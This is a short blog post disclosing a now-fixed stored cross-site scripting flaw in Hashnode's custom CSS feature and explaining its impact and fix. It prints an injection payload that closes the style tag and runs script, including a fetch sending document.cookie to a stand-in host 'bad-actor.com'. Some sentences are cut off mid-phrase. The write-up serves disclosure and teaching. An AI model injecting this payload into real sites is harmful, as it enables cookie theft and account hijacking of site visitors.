Note: this has been fixed now 😌
Kudos to the Hashnode team for fixing this so fast 🎉
The custom CSS feature on Hashnode allows us to style the site with CSS, which seems to be directly inserted in the head. I just added a script tag at the end of my CSS...
/* ... styles ... */ </style> <script> alert(document.cookie) /* get your cookies, possibly giving access to your account */ fetch('bad-actor.com/?cookie=' + document.cookie); </script>
What this does is close the
<style> tag and insert a new
We can't extract any user data or JWTs since they were added as HttpOnly cookies which can't be read by the client using this trick. But you can still do anything on behalf of the logged-in user as long as the JWT works, say post a random comment. You could probably also extract refresh tokens, but I didn't go too deep into that.
What we can do is exploit your trust in Hashnode and, say, redirect you to malicious sites which you may trust since you came from a Hashnode site.
You could also do other annoying stuff like send notifications, eat your RAM and crash your system, or redirect you to the annoying site (warning: that site is super annoying!)
I didn't add any malicious code in there, luckily for you. It has been fixed by converting all
> and other symbols to their
Key takeaway: Sanitize your database inputs.